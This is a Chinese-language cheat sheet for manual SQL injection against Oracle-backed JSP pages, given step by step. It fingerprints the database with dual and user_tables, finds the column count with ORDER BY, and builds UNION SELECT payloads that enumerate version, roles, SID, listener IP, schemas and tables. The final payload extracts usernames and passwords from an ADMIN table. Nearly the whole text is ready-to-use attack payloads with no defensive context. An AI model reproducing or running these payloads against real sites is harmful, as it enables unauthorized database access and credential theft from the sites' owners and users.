1判斷是什么數據庫

and exist(select * from dual)

and exists(select * from user_tables)

原理：dual表和user_tables表是oracle中的系統表返回正常，那么就可以肯定這是oracle。

2查字段數

order by 10--? //錯誤,列數小于10

order by 3--??? //正常,列數等于或大于3

3判斷字段類型

.jsp?id=1 union select NULL,NULL,NULL from dual--? /*正常說明有3個字段*/

and 1=2 union select NULL,NULL,'string' from dual--? ? //正常,第三個字段是字符型

下面替換“string”，記得帶括號

數據庫與版本 (SELECT banner FROM sys.v_$version WHERE ROWNUM=1)

當前用戶權限?(SELECT?*?FROM?session_roles WHERE?ROWNUM=1)

數據庫名?(Select?name?From?v$database)

當前庫所有表?(Select?table_name?From?all_tables)

服務器系統?? (select member from v$logfile where rownum=1)

服務器監聽IP (select utl_inaddr.get_host_address from dual)

數據庫SID?? (select instance_name from v$instance)

4獲取所有數據庫名

id=1 and 1=2 union select NULL,(select global_name from global_name),NULL from dual--

id=1 and 1=2 union select NULL,(select sys.database_name from dual),NULL from dual--

id=1 and 1=2 union select NULL,(select name from v$database),NULL from dual--

第一個庫名

id=1 and 1=2 union select NULL,(select owner from all_tables where rownum=1),NULL from dual--

第二個庫名

id=1 and 1=2 union select NULL,(select owner from all_tables where owner<>'SYS' and rownum=1),NULL from dual--

第三個庫名

id=1 and 1=2 union select NULL,(select owner from all_tables where owner<>'SYS' and owner<>'SYSTEM' and rownum=1),NULL from dual--

查到的第一個是SYS，那么查第二個的時候就把SYS排除，比如第二個查出的是SYSTEM，那么第三個就排除前兩個

當前表名

id=1 and 1=2 union select NULL,(select table_name from user_tables where rownum=1),NULL from dual--

剩下的表名

id=1 and 1=2 union select NULL,(select table_name from user_tables where rownum=1 and table_name<>'ADMIN'),NULL from dual--

使用<>'表名'不斷添加要排除的表名查詢，表名區分大小寫。

5查詢字段內容

id=1 and 1=2 union select NULL,USERNAME,PASSWORD from ADMIN—